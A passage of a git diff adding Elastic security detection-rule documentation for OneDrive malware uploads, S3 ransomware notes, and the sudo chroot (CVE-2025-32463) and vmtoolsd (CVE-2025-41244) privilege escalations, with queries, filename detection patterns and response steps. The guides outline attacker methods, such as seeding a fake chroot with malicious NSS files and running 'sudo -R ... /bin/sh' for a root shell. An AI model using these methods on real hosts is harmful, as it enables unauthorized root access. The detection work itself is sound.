+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Tactic: Lateral Movement +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating OneDrive Malware File Upload* + + +OneDrive, a cloud storage service, facilitates file sharing and collaboration within organizations. However, adversaries can exploit this by uploading malware, which can spread across shared environments, leading to lateral movement within a network. The detection rule identifies such threats by monitoring OneDrive activities for malware detection events, focusing on file operations flagged by Microsoft's security engine. This proactive approach helps in identifying and mitigating potential breaches. + + +*Possible investigation steps* + + +- Review the alert details to confirm the event dataset is 'o365.audit' and the event provider is 'OneDrive' to ensure the alert is relevant to OneDrive activities. +- Examine the specific file operation flagged by the event code 'SharePointFileOperation' and action 'FileMalwareDetected' to identify the file in question and understand the nature of the detected malware. +- Identify the user account associated with the file upload to determine if the account has been compromised or if the user inadvertently uploaded the malicious file. +- Check the sharing settings of the affected file to assess the extent of exposure and identify any other users or systems that may have accessed the file. +- Investigate the file's origin and history within the organization to trace how it was introduced into the environment and whether it has been shared or accessed by other users. +- Review any additional security alerts or logs related to the user account or file to identify potential patterns of malicious activity or further compromise. +- Coordinate with IT and security teams to isolate the affected file and user account, and initiate remediation steps to prevent further spread of the malware. + + +*False positive analysis* + + +- Legitimate software updates or patches may be flagged as malware if they are not yet recognized by the security engine. Users should verify the source and integrity of the file and consider adding it to an exception list if confirmed safe. +- Files containing scripts or macros used for automation within the organization might trigger false positives. Review the file's purpose and origin, and whitelist it if it is a known and trusted internal tool. +- Shared files from trusted partners or vendors could be mistakenly identified as threats. Establish a process to verify these files with the sender and use exceptions for recurring, verified files. 
+- Archived or compressed files that contain known safe content might be flagged due to their format. Decompress and scan the contents separately to confirm their safety before adding exceptions. +- Files with unusual or encrypted content used for legitimate business purposes may be misclassified. Ensure these files are documented and approved by IT security before excluding them from alerts. + + +*Response and remediation* + + +- Immediately isolate the affected OneDrive account to prevent further file sharing and potential spread of malware within the organization. +- Notify the user associated with the account about the detected malware and instruct them to cease any file sharing activities until further notice. +- Conduct a thorough scan of the affected files using an updated antivirus or endpoint detection and response (EDR) solution to confirm the presence of malware and identify any additional infected files. +- Remove or quarantine the identified malicious files from OneDrive and any other locations they may have been shared to prevent further access or execution. +- Review and revoke any shared links or permissions associated with the infected files to ensure no unauthorized access is possible. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if any lateral movement or additional compromise has occurred. +- Implement enhanced monitoring and alerting for similar OneDrive activities to quickly detect and respond to any future malware uploads or related threats. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFileOperation and event.action:FileMalwareDetected + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Taint Shared Content +** ID: T1080 +** Reference URL: https://attack.mitre.org/techniques/T1080/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Stage Capabilities +** ID: T1608 +** Reference URL: https://attack.mitre.org/techniques/T1608/ +* Sub-technique: +** Name: Upload Malware +** ID: T1608.001 +** Reference URL: https://attack.mitre.org/techniques/T1608/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc new file mode 100644 index 0000000000..5fe0b952f3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc @@ -0,0 +1,159 @@ +[[prebuilt-rule-8-19-8-potential-aws-s3-bucket-ransomware-note-uploaded]] +=== Potential AWS S3 Bucket Ransomware Note Uploaded + +Identifies potential ransomware note being uploaded to an AWS S3 bucket. This rule detects the PutObject S3 API call with a common ransomware note file name or extension such as ransom or .lock. 
Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims. + +*Rule type*: eql + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://stratus-red-team.cloud/attack-techniques/AWS/aws.impact.s3-ransomware-batch-deletion/ +* https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/ + +*Tags*: + +* Domain: Cloud +* Data Source: AWS +* Data Source: Amazon Web Services +* Data Source: AWS S3 +* Use Case: Threat Detection +* Tactic: Impact +* Resources: Investigation Guide + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential AWS S3 Bucket Ransomware Note Uploaded* + + +This rule detects a successful `PutObject` to S3 where the object key matches common ransomware-note patterns (for example, `readme`, `how_to_decrypt`, `decrypt_instructions`, `ransom`, `lock`). Attackers who obtain credentials or abuse overly-permissive bucket policies can upload ransom notes (often after deleting or encrypting data). + + +*Possible Investigation Steps:* + +- **Confirm the actor and session details.** Review `aws.cloudtrail.user_identity.*` (ARN, type, access key, session context), `source.ip`, `user.agent`, and `tls.client.server_name` to identify *who* performed the upload and *from where*. Validate whether this principal typically writes to this bucket. +- **Inspect the object key and bucket context.** From `aws.cloudtrail.request_parameters`, capture the exact `key` and `bucketName`. Check whether the key is publicly readable (ACL), whether the bucket is internet-exposed, and whether replication or lifecycle rules could propagate or remove related objects. +- **Pivot to related S3 activity around the same time.** Look for `DeleteObject`/`DeleteObjects`, mass `PutObject` spikes, `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning`, and `PutBucketLifecycleConfiguration` events on the same bucket or by the same actor to determine if data destruction, policy tampering, or guard-rail changes occurred. +- **Assess blast radius across the account.** Search recent CloudTrail for the same actor/IP touching other buckets, KMS keys used by those buckets, and IAM changes (new access keys, policy attachments, role assumptions) that could indicate broader compromise paths consistent with ransomware playbooks. +- **Check protections and recovery posture on the bucket.** Verify whether S3 Versioning and (if in use) Object Lock legal hold are enabled; note prior versions available for the affected key, and whether lifecycle rules might expire them. +- **Correlate with threat signals.** Review other related alerts, GuardDuty S3-related findings, AWS Config drift on the bucket and its policy, and any SOAR/IR runbook executions tied to ransomware triage. 
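+
+To support the pivot and scoping steps above, a hedged EQL sketch over the same CloudTrail data is shown below; the actor ARN is a placeholder from the alert, and the field names assume the AWS integration mapping referenced in this guide.
+
+[source, js]
+----------------------------------
+// Related S3 tampering by the same principal: deletions, policy edits,
+// public-access, versioning, and lifecycle changes.
+// Replace the ARN placeholder with the value from the alert.
+any where event.dataset == "aws.cloudtrail" and
+  event.provider == "s3.amazonaws.com" and
+  event.action in ("DeleteObject", "DeleteObjects", "PutBucketPolicy", "PutPublicAccessBlock",
+                   "PutBucketVersioning", "PutBucketLifecycleConfiguration") and
+  aws.cloudtrail.user_identity.arn == "<actor-arn-from-the-alert>"
+----------------------------------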
+ + +*False Positive Analysis:* + +- **Planned tests or red-team exercises.** Confirm change tickets or test windows for staging/dev buckets; red teams often drop “ransom-note-like” files during exercises. +- **Benign automation naming.** Some data-migration or backup tools may use “readme”/“recovery”-style filenames; validate by `user.agent`, principal, and target environment (dev vs prod). +- **Log/archive buckets.** Exclude infrastructure/logging buckets (for example, `AWSLogs`, CloudTrail, access logs) per rule guidance to reduce noise. + + +*Response and Remediation:* + + +**1. Immediate, low-risk actions (safe for most environments)** +- **Preserve context:** Export the triggering `PutObject` CloudTrail record(s), plus 15–30 min before/after, to an evidence bucket (restricted access). +- **Snapshot configuration:** Record current bucket settings (Block Public Access, Versioning, Object Lock, Bucket Policy, Lifecycle rules) and any KMS keys used. +- **Quiet the spread:** Pause destructive automation: disable/bypass lifecycle rules that would expire/delete object versions; temporarily pause data pipelines targeting the bucket. +- **Notify owners:** Inform the bucket/application owner(s) and security leadership. + +**2. Containment options (choose the least disruptive first)** +- **Harden exposure:** If not already enforced, enable `Block Public Access` for the bucket. +- **Targeted deny policy (temporary):** Add a restrictive bucket policy allowing only IR/admin roles while you scope impact. Reconfirm critical workload dependencies before applying. +- **Credential risk reduction:** If a specific IAM user/key or role is implicated, rotate access keys; for roles, remove risky policy attachments or temporarily restrict with an SCP/deny statement. + +**3. Evidence preservation** +- Export relevant CloudTrail events, S3 server/access logs (if enabled), AWS Config history for the bucket/policy, and the suspicious object plus its previous versions (if Versioning is enabled). +- Document actor ARN, source IPs, user agent(s), exact `bucketName`/`key`, and timestamps. Maintain a simple chain-of-custody note for collected artifacts. + +**4. Scope and hunting (same actor/time window)** +- Look for `DeleteObject(s)`, unusual `PutObject` volume, `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning` changes, `PutBucketLifecycleConfiguration`, and cross-account access. +- Cross reference other buckets touched by the same actor/IP; recent IAM changes (new keys, policy/role edits); GuardDuty findings tied to S3/credentials. + +**5. Recovery (prioritize data integrity)** +- If Versioning is enabled, restore last known-good versions for impacted objects. Consider applying Object Lock legal hold to clean versions during recovery if configured. +- If Versioning is not enabled, recover from backups (AWS Backup, replication targets). Enable Versioning going forward on critical buckets; evaluate Object Lock for high-value data. +- Carefully remove any temporary deny policy only after credentials are rotated, policies re-validated, and no ongoing destructive activity is observed. + +**6. Post-incident hardening** +- Enforce `Block Public Access`, enable Versioning (and MFA-Delete where appropriate), and review bucket policies for least privilege. +- Ensure continuous CloudTrail data events for S3 are enabled in covered regions; enable/verify GuardDuty S3 protections and alerts routing. 
+- Add detections for related behaviors (policy tampering, bulk deletes, versioning/lifecycle toggles) and create allowlists for known maintenance windows. + +**7. Communication & escalation** +- If you have an IR team/provider: escalate with the evidence bundle and a summary (bucket/key, actor, protections, related activity, business impact). +- If you do not have an IR team: designate an internal incident lead, track actions/time, and follow these steps conservatively. Favor reversible controls (temporary deny, key rotation) over invasive changes. + + +*Additional Information:* + +- For further guidance on managing S3 bucket security and protecting against ransomware, refer to the https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html[AWS S3 documentation] and AWS best practices for security. +- https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/IRP-Ransomware.md[AWS IRP—Ransomware] (NIST-aligned template for evidence, containment, eradication, recovery, post-incident). +- https://github.com/aws-samples/aws-customer-playbook-framework/blob/a8c7b313636b406a375952ac00b2d68e89a991f2/docs/Ransom_Response_S3.md[AWS Customer Playbook—Ransom Response (S3)] (bucket-level response steps: public access blocks, temporary deny, versioning/object lock, lifecycle considerations, recovery). + + +==== Setup + + +AWS S3 data types need to be enabled in the CloudTrail trail configuration to capture PutObject API calls. + +==== Rule query + + +[source, js] +---------------------------------- +file where + event.dataset == "aws.cloudtrail" and + event.provider == "s3.amazonaws.com" and + event.action == "PutObject" and + event.outcome == "success" and + /* Apply regex to match patterns only after the bucket name */ + aws.cloudtrail.resources.arn regex "arn:aws:s3:::[^/]+/.*?(ransom|lock|crypt|enc|readme|how_to_decrypt|decrypt_instructions|recovery|datarescue).*" and + not aws.cloudtrail.resources.arn regex ".*(AWSLogs|CloudTrail|access-logs).*" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Technique: +** Name: Data Encrypted for Impact +** ID: T1486 +** Reference URL: https://attack.mitre.org/techniques/T1486/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-32463-nsswitch-file-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-32463-nsswitch-file-creation.asciidoc new file mode 100644 index 0000000000..6f28e6d984 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-32463-nsswitch-file-creation.asciidoc @@ -0,0 +1,159 @@ +[[prebuilt-rule-8-19-8-potential-cve-2025-32463-nsswitch-file-creation]] +=== Potential CVE-2025-32463 Nsswitch File Creation + +Detects suspicious creation of the nsswitch.conf file, outside of the regular /etc/nsswitch.conf path, consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. 
+ +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* +* logs-sentinel_one_cloud_funnel.* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot +* https://github.com/kh4sh3i/CVE-2025-32463 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Use Case: Vulnerability +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential CVE-2025-32463 Nsswitch File Creation* + + +This rule flags creation of an nsswitch.conf file outside the standard /etc location by a shell, an early sign of staging a fake root to coerce sudo's chroot path and hijack NSS resolution (CVE-2025-32463). A common pattern is writing /tmp/chroot/etc/nsswitch.conf, placing or pointing to a malicious NSS module, then running sudo chroot into that directory so name lookups load attacker-controlled code and escalate to root. + + +*Possible investigation steps* + + +- Correlate the event with any sudo or chroot executions within ±10 minutes that reference the same directory prefix (e.g., /tmp/chroot), capturing full command line, user, TTY, working directory, and exit codes. +- Inspect the created nsswitch.conf for nonstandard services or module names and enumerate any libnss_*.so* under lib*/ or usr/lib*/ within that prefix, recording owner, hashes, and timestamps. +- List all contemporaneous file writes under the same prefix (etc, lib*, bin, sbin) to determine whether a chroot rootfs is being assembled and attribute it to a toolchain such as tar, rsync, debootstrap, or custom scripts via process ancestry. +- Search file access telemetry to see whether privileged processes subsequently read that specific nsswitch.conf or loaded libnss_* from the same path, which would indicate the chroot was exercised. +- Verify sudo and glibc versions and patch status for CVE-2025-32463 and collect the initiating user’s session context (SSH source, TTY, shell history) to assess exploitability and scope. + + +*False positive analysis* + + +- An administrator legitimately staging a temporary chroot or test root filesystem may use a shell to create /tmp/*/etc/nsswitch.conf while populating configs, matching the rule even though no privilege escalation is intended. +- OS installation, recovery, or backup-restore workflows run from a shell can populate a mounted target like /mnt/newroot/etc/nsswitch.conf, creating the file outside /etc as part of maintenance and triggering the alert. 
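+
+A minimal EQL sketch that supports both the sudo/chroot correlation step above and the process-termination step that follows; `/tmp/chroot` is only an example prefix and should be replaced with the parent directory of the nsswitch.conf path from the alert.
+
+[source, js]
+----------------------------------
+// sudo or chroot invocations referencing the staged prefix from the alert.
+process where host.os.type == "linux" and event.type == "start" and
+  process.name in ("sudo", "chroot") and
+  process.command_line like "*/tmp/chroot*"
+----------------------------------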
+ + +*Response and remediation* + + +- Terminate any sudo or chroot processes referencing the created path (e.g., /tmp/chroot/etc/nsswitch.conf), lock the initiating user’s sudo access, and quarantine the parent directory with root-only permissions. +- Remove the staged nsswitch.conf and any libnss_*.so* or ld.so.* artifacts under lib*/ or usr/lib*/ within that prefix after collecting copies, hashes, and timestamps for evidence. +- Restore and verify /etc/nsswitch.conf on the host with correct content and root:root 0644, purge temporary chroot roots under /tmp, /var/tmp, or /mnt, and restart nscd or systemd-resolved to flush cached name-service data. +- Escalate to incident response if sudo chroot was executed against the same directory, if root processes loaded libnss_* from that path, or if nsswitch.conf appears outside /etc on multiple hosts within a short window. +- Apply vendor fixes for CVE-2025-32463 to sudo and glibc, disallow chroot in sudoers and enforce env_reset, noexec, and secure_path, and mount /tmp and /var/tmp with noexec,nosuid,nodev to prevent libraries being sourced from user-writable paths. +- Add controls to block execution from user-created chroot trees by policy (AppArmor or SELinux) and create alerts on creation of */etc/nsswitch.conf or libnss_* writes under non-system paths, with auto-isolation for directories under /tmp or a user’s home. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "creation" and file.path like "/*/etc/nsswitch.conf" and +process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and +not ( + process.name == "dash" and file.path like ("/var/tmp/mkinitramfs_*", "/tmp/tmp.*/mkinitramfs_*") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc new file mode 100644 index 0000000000..c7ecaf2c2a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc @@ -0,0 +1,159 @@ +[[prebuilt-rule-8-19-8-potential-cve-2025-32463-sudo-chroot-execution-attempt]] +=== Potential CVE-2025-32463 Sudo Chroot Execution Attempt + +Detects suspicious use of sudo's --chroot / -R option consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot +* https://github.com/kh4sh3i/CVE-2025-32463 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Use Case: Vulnerability +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential CVE-2025-32463 Sudo Chroot Execution Attempt* + + +This rule highlights sudo invoked with the chroot (-R/--chroot) option outside normal administration, a behavior tied to CVE-2025-32463 where attackers force sudo to load attacker-controlled NSS configs or libraries and escalate to root. An attacker pattern: running sudo -R /tmp/fakechroot /bin/sh after seeding that directory with malicious nsswitch.conf and libnss to obtain a root shell. Treat unexpected chrooted sudo on Linux hosts as high-risk privilege escalation activity. 
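+
+The staging pattern described above can also be hunted directly; the sketch below is illustrative only and not part of the shipped rule, and the excluded library paths are an assumption to tune per distribution.
+
+[source, js]
+----------------------------------
+// NSS modules written outside the expected system library locations.
+file where host.os.type == "linux" and event.type == "creation" and
+  file.name like "libnss_*.so*" and
+  not file.path like ("/usr/lib*", "/lib*")
+----------------------------------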
+ + +*Possible investigation steps* + + +- Extract the chroot target path from the event and enumerate its etc and lib directories for attacker-seeded NSS artifacts (nsswitch.conf, libnss_*, ld.so.preload) and fake passwd/group files, noting recent mtime, ownership, and world-writable files. +- Pivot to file-creation and modification telemetry to identify processes and users that populated that path shortly before execution (e.g., curl, wget, tar, git, gcc), linking them to the invoking user to establish intent. +- Review session and process details to see if a shell or interpreter was launched inside the chroot and whether an euid transition to 0 occurred, indicating a successful privilege escalation. +- Confirm sudo’s package version and build options and the user’s sudoers policy (secure_path/env_* settings and any NOPASSWD allowances) to assess exploitability and whether chroot usage was authorized. +- Collect and preserve the chroot directory contents and relevant audit/log artifacts, and scope by searching for similar chroot invocations or NSS file seeds across the host and fleet. + + +*False positive analysis* + + +- A legitimate offline maintenance session where an administrator chroots into a mounted system under /mnt or /srv using sudo --chroot to run package or initramfs commands, which will trigger when the invoked program is not in the whitelist. +- An image-building or OS bootstrap workflow that stages a root filesystem and uses sudo -R to execute a shell or build/configuration scripts inside the chroot, producing the same pattern from a known user or host context. + + +*Response and remediation* + + +- Immediately isolate the affected host from the network, revoke the invoking user’s sudo privileges, and terminate any chrooted shells or child processes spawned via “sudo -R /bin/sh” or similar executions. +- Preserve evidence and then remove attacker-seeded NSS and loader artifacts within the chroot path—delete or replace nsswitch.conf, libnss_*.so, ld.so.preload, passwd, and group files, and clean up world-writable staging directories like /tmp/fakechroot. +- Upgrade sudo to a fixed build that addresses CVE-2025-32463, and recover by restoring any modified system NSS and loader files from known-good backups while validating ownership, permissions, and hashes. +- Escalate to full incident response if a root shell or process with euid 0 is observed, if /etc/ld.so.preload or /lib/libnss_*.so outside the chroot show unauthorized changes, or if similar “sudo -R” executions appear across multiple hosts. +- Harden by updating sudoers to remove NOPASSWD for chrooted commands, enforce Defaults env_reset and secure_path with noexec, disable “--chroot” usage for non-admin workflows, and monitor for creation of libnss_*.so or nsswitch.conf in non-standard directories. +- Add platform controls by enabling SELinux/AppArmor policies on sudo and the dynamic loader, applying nodev,nosuid,noexec mounts to /tmp and build paths, and setting immutability (chattr +i) on /etc/nsswitch.conf where operationally feasible. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. 
+- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "executed", "process_started", "ProcessRollup2") and +process.name == "sudo" and process.args in ("-R", "--chroot") and +// To enforce the -R and --chroot arguments to be for sudo specifically, while wildcarding potential full sudo paths +process.command_line like ("*sudo -R*", "*sudo --chroot*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc new file mode 100644 index 0000000000..d40f8ece52 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc @@ -0,0 +1,164 @@ +[[prebuilt-rule-8-19-8-potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt]] +=== Potential CVE-2025-41244 vmtoolsd LPE Exploitation Attempt + +This rule looks for processes that behave like an attacker trying to exploit a known vulnerability in VMware tools (CVE-2025-41244). The vulnerable behavior involves the VMware tools service or its discovery scripts executing other programs to probe their version strings. 
An attacker can place a malicious program in a writable location (for example /tmp) and have the tools execute it with elevated privileges, resulting in local privilege escalation. The rule flags launches where vmtoolsd or the service discovery scripts start other child processes. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Use Case: Vulnerability +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential CVE-2025-41244 vmtoolsd LPE Exploitation Attempt* + + +This rule flags child processes started by vmtoolsd or its version-checking script on Linux, behavior central to CVE-2025-41244 where the service executes external utilities to read version strings. It matters because a local user can coerce these invocations to run arbitrary code with elevated privileges. A typical pattern is dropping a counterfeit lsb_release or rpm in /tmp, modifying PATH, and triggering vmtoolsd/get-versions.sh so the rogue binary executes and spawns a privileged shell or installer. + + +*Possible investigation steps* + + +- Examine the executed child binary’s full path and location, flagging any binaries in 